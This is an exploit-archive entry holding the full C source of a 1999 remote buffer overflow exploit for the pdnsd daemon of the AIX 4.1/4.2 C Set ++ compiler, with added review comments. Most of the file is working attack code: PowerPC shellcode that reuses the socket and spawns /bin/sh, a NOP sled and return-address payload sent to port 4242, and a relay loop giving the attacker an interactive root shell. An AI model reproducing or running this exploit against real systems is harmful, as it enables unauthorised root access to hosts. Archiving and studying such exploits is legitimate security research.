"AIX 4.1/4.2 - 'pdnsd' Remote Buffer Overflow"

Author

Exploit author

"Last Stage of Delirium"

Platform

Exploit platform

aix

Release date

Exploit published date

1999-08-17

// source: https://www.securityfocus.com/bid/3237/info

The Source Code Browser's Program Database Name Server Daemon (pdnsd) component of the C Set ++ compiler for AIX contains a remotely exploitable buffer overflow. This vulnerability allows local or remote attackers to gain root privileges on vulnerable systems.

/*## copyright LAST STAGE OF DELIRIUM oct 1999 poland        *://lsd-pl.net/ #*/
/*## pdnsd                                                                   #*/

/*   note: to avoid potential system hang-up please, first obtain the exact   */
/*   AIX OS level with the use of some OS fingerprinting method               */

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>

#define ADRNUM 4000   /* number of address bytes appended after the code strings (main()) */
#define NOPNUM 4800   /* number of NOP bytes placed before the code; also used to compute the address */
#define ALLIGN 1      /* number of alignment bytes inserted between the code strings and the address block */

/* 12-byte OS-level-specific tables; main() copies one of them over
   syscallcode[32..43] according to argv[2] ("41" or "42") */
#define SCAIX41 "\x03\x68\x41\x5e\x6d\x7f\x6f\xd6\x57\x56\x55\x53"
#define SCAIX42 "\x02\x71\x46\x62\x76\x8e\x78\xe7\x5b\x5a\x59\x58"

/* First code string (PowerPC).  It locates itself with the bnel/mflr pair
   shown below; the three 0xffffffff words at offsets 32..43 are placeholders
   that main() overwrites with SCAIX41 or SCAIX42.  main() copies it with
   strlen(), so the string must not contain a 0x00 byte (it does not). */
char syscallcode[]=
    "\x7e\x94\xa2\x79"     /* xor.    r20,r20,r20            */
    "\x40\x82\xff\xfd"     /* bnel    <syscallcode>          */
    "\x7e\xa8\x02\xa6"     /* mflr    r21                    */
    "\x3a\xc0\x01\xff"     /* lil     r22,0x1ff              */
    "\x3a\xf6\xfe\x2d"     /* cal     r23,-467(r22)          */
    "\x7e\xb5\xba\x14"     /* cax     r21,r21,r23            */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x20"     /* bctr                           */
    "\xff\xff\xff\xff"     /* offsets 32..43: placeholder,   */
    "\xff\xff\xff\xff"     /* replaced at run time by main() */
    "\xff\xff\xff\xff"     /* with SCAIX41 / SCAIX42         */
    "\x4c\xc6\x33\x42"     /* crorc   cr6,cr6,cr6            */
    "\x44\xff\xff\x02"     /* svca    0x0                    */
    "\x3a\xb5\xff\xf8"     /* cal     r21,-8(r21)            */
;

/* Second code string (PowerPC).  Bytes 2..3 -- the 0x1234 immediate of the
   first cmpi -- are patched by main() with this client's local TCP port
   before the buffer is assembled.  Copied with strlen(), so it must not
   contain a 0x00 byte (it does not). */
char findsckcode[]=
    "\x2c\x74\x12\x34"     /* cmpi    cr0,r20,0x1234         */
    "\x41\x82\xff\xfd"     /* beql    <findsckcode>          */
    "\x7f\x08\x02\xa6"     /* mflr    r24                    */
    "\x3b\x36\xfe\x2d"     /* cal     r25,-467(r22)          */
    "\x3b\x40\x01\x01"     /* lil     r26,0x16               */
    "\x7f\x78\xca\x14"     /* cax     r27,r24,r25            */
    "\x7f\x69\x03\xa6"     /* mtctr   r27                    */
    "\x4e\x80\x04\x20"     /* bctr                           */
    "\xa3\x78\xff\xfe"     /* lhz     r27,-2(r24)            */
    "\xa3\x98\xff\xfa"     /* lhz     r28,-6(r24)            */
    "\x7c\x1b\xe0\x40"     /* cmpl    cr0,r27,r28            */
    "\x3b\x36\xfe\x59"     /* cal     r25,-423(r22)          */
    "\x41\x82\xff\xe4"     /* beq     <findsckcode+20>       */
    "\x7f\x43\xd3\x78"     /* mr      r3,r26                 */
    "\x38\x98\xff\xfc"     /* cal     r4,-4(r24)             */
    "\x38\xb8\xff\xf4"     /* cal     r5,-12(r24)            */
    "\x93\x38\xff\xf4"     /* st      r25,-12(r24)           */
    "\x88\x55\xff\xf6"     /* lbz     r2,-10(r21)            */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x37\x5a\xff\xff"     /* ai.     r26,r26,-1             */
    "\x2d\x03\xff\xff"     /* cmpi    cr2,r3,-1              */
    "\x40\x8a\xff\xc8"     /* bne     cr2,<findsckcode+32>   */
    "\x40\x82\xff\xd8"     /* bne     <findsckcode+48>       */
    "\x3b\x36\xfe\x03"     /* cal     r25,-509(r22)          */
    "\x3b\x76\xfe\x02"     /* cal     r27,-510(r22)          */
    "\x7f\x23\xcb\x78"     /* mr      r3,r25                 */
    "\x88\x55\xff\xf7"     /* lbz     r2,-9(r21)             */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x7c\x7a\xda\x14"     /* cax     r3,r26,r27             */
    "\x7e\x84\xa3\x78"     /* mr      r4,r20                 */
    "\x7f\x25\xcb\x78"     /* mr      r5,r25                 */
    "\x88\x55\xff\xfb"     /* lbz     r2,-5(r21)             */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x37\x39\xff\xff"     /* ai.     r25,r25,-1             */
    "\x40\x80\xff\xd4"     /* bge     <findsckcode+100>      */
;

/* Third code string (PowerPC), followed directly by the literal "/bin/sh".
   Copied with strlen(), so it must not contain a 0x00 byte (it does not);
   strlen(shellcode) is also part of the length announced in the 4-byte
   prefix built by main(). */
char shellcode[]=
    "\x7c\xa5\x2a\x79"     /* xor.    r5,r5,r5               */
    "\x40\x82\xff\xfd"     /* bnel    <shellcode>            */
    "\x7f\xe8\x02\xa6"     /* mflr    r31                    */
    "\x3b\xff\x01\x20"     /* cal     r31,0x120(r31)         */
    "\x38\x7f\xff\x08"     /* cal     r3,-248(r31)           */
    "\x38\x9f\xff\x10"     /* cal     r4,-240(r31)           */
    "\x90\x7f\xff\x10"     /* st      r3,-240(r31)           */
    "\x90\xbf\xff\x14"     /* st      r5,-236(r31)           */
    "\x88\x55\xff\xf4"     /* lbz     r2,-12(r21)            */
    "\x98\xbf\xff\x0f"     /* stb     r5,-241(r31)           */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x20"     /* bctr                           */
    "/bin/sh"
;

/* 4-byte filler instruction; main() repeats it NOPNUM times (byte i%4) in
   front of the code strings */
char nop[]="\x7f\xff\xfb\x78";

/*
 * Entry point.  argv[1] is the target host (dotted quad or host name) and
 * argv[2] the AIX level ("41" or "42"), which selects the 12-byte table
 * copied over syscallcode[32..43].  The program connects to TCP port 4242,
 * assembles one length-prefixed buffer (NOPs, the three code strings, ALLIGN
 * bytes, ADRNUM address bytes), writes it in two pieces with a 3 s pause,
 * then relays stdin <-> socket until a read() on either side fails.
 *
 * On the wire this is: a TCP connection to port 4242, a 4-byte big-endian
 * length prefix followed by the announced number of payload bytes (the last
 * of them sent alone after a 3 s delay), then "/bin/uname -a\n".
 *
 * NOTE(review): pre-C99 style code.  exit()/atoi() (stdlib.h),
 * memcpy()/strlen() (string.h), inet_addr() (arpa/inet.h), ioctl()
 * (sys/ioctl.h) and select() (sys/select.h) are called without prototypes;
 * main() has an implicit int return type and no return statement; the
 * results of socket(), write(), send() and the relay's write()s are not
 * checked.  Several casts assume a 32-bit unsigned long (ILP32 AIX).
 */
main(int argc,char **argv){
    char buffer[10000],address[4],*b;
    int i,n,l,cnt,sck;   /* this cnt is never used: the relay loop declares its own */
    struct hostent *hp;
    struct sockaddr_in adr;

    printf("copyright LAST STAGE OF DELIRIUM oct 1999 poland  //lsd-pl.net/\n");
    printf("pdnsd for AIX 4.1 4.2 PowerPC/POWER\n\n");

    if(argc!=3){
        printf("usage: %s address 41|42\n",argv[0]);exit(-1);
    }

    /* select the OS-level-specific 12 bytes and patch them into syscallcode
       at offset 32 (the 0xffffffff placeholder words) */
    switch(atoi(argv[2])){
    case 41: memcpy(&syscallcode[32],SCAIX41,12); break;
    case 42: memcpy(&syscallcode[32],SCAIX42,12); break;
    default: exit(-1);
    }

    sck=socket(AF_INET,SOCK_STREAM,0);   /* NOTE(review): -1 is not checked and would reach connect() */
    adr.sin_family=AF_INET;
    adr.sin_port=htons(4242);            /* fixed target port */
    /* inet_addr() yields INADDR_NONE (all bits set, == (unsigned)-1) for a
       non-numeric string; fall back to a name lookup in that case */
    if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
        if((hp=gethostbyname(argv[1]))==NULL){
            errno=EADDRNOTAVAIL;perror("error");exit(-1);
        }
        memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);   /* assumes a 4-byte (IPv4) h_addr */
    }

    if(connect(sck,(struct sockaddr*)&adr,sizeof(struct sockaddr_in))<0){
        perror("error");exit(-1);
    }

    /* l is the length announced in the 4-byte prefix: NOP bytes, shellcode
       and address bytes only.  The buffer assembled below also holds
       syscallcode, findsckcode and ALLIGN bytes, so the tail of the address
       block (beyond 4+l bytes) is assembled but never sent. */
    l=ADRNUM+NOPNUM+strlen(shellcode);
    /* NOTE(review): writes an unsigned long through a char[4].  Correct only
       when unsigned long is 4 bytes (ILP32); on an LP64 build this overruns
       address[] into neighbouring stack and it is a strict-aliasing
       violation either way.  The same cast is used for b below. */
    *((unsigned long*)address)=htonl(0x2ff20908+(NOPNUM>>1));

    i=sizeof(struct sockaddr_in);
    /* determine the local end of the connection; if getsockname() fails,
       fall back to STREAMS ioctls.  The numeric requests look like I_PUSH
       ("sockmod") and TI_GETMYNAME -- TODO confirm against the AIX headers;
       nb mirrors a struct netbuf (maxlen/len/buf). */
    if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
        struct netbuf {unsigned int maxlen;unsigned int len;char *buf;}nb;
        ioctl(sck,(('S'<<8)|2),"sockmod");
        nb.maxlen=0xffff;
        nb.len=sizeof(struct sockaddr_in);;
        nb.buf=(char*)&adr;
        ioctl(sck,(('T'<<8)|144),&nb);
    }
    n=ntohs(adr.sin_port);   /* this client's local (source) port */
    printf("port=%d connected! ",n);fflush(stdout);

    /* store the local port, big-endian, into bytes 2..3 of findsckcode --
       the 0x1234 immediate of its first cmpi instruction */
    findsckcode[0+2]=(unsigned char)((n&0xff00)>>8);
    findsckcode[0+3]=(unsigned char)(n&0xff);

    /* assemble: [4-byte length][NOPNUM nops][syscallcode][findsckcode]
       [shellcode][ALLIGN address bytes][ADRNUM address bytes][0]
       (the three code strings contain no 0x00 byte, so strlen() copies
       them whole); total stays well inside buffer[10000] */
    b=buffer;
    *((unsigned long*)b)=htonl(l);   /* see the ILP32 note above */
    b+=4;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(syscallcode);i++) *b++=syscallcode[i];
    for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
    for(i=0;i<strlen(shellcode);i++)   *b++=shellcode[i];
    for(i=0;i<ALLIGN;i++) *b++=address[i%4];
    for(i=0;i<ADRNUM;i++) *b++=address[i%4];
    *b=0;

    /* send the prefix plus l-1 payload bytes, wait 3 s, then the single
       byte that completes the announced length (4+l bytes in total);
       neither write() nor send() is checked for short writes or errors */
    write(sck,buffer,4+l-1);sleep(3);
    send(sck,"x",1,0);
    printf("sent!\n");

    /* first command line for the remote side, then a plain relay loop:
       stdin -> socket and socket -> stdout.  A read() result < 1 ends the
       loop unless errno says EWOULDBLOCK/EAGAIN.  NOTE(review): read()==0
       (EOF) also takes that branch with a stale errno, so EOF may be
       mistaken for a would-block condition and the loop continues. */
    write(sck,"/bin/uname -a\n",14);
    while(1){
        fd_set fds;
        FD_ZERO(&fds);
        FD_SET(0,&fds);
        FD_SET(sck,&fds);
        /* no timeout; a -1 (error) result is also non-zero and enters the
           body, where FD_ISSET() is evaluated on an undefined set */
        if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
            int cnt;            /* shadows the unused outer cnt */
            char buf[1024];
            if(FD_ISSET(0,&fds)){
                if((cnt=read(0,buf,1024))<1){
                    if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
                    else break;
                }
                write(sck,buf,cnt);   /* partial writes are not retried */
            }
            if(FD_ISSET(sck,&fds)){
                if((cnt=read(sck,buf,1024))<1){
                    if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
                    else break;
                }
                write(1,buf,cnt);     /* partial writes are not retried */
            }
        }
    }
}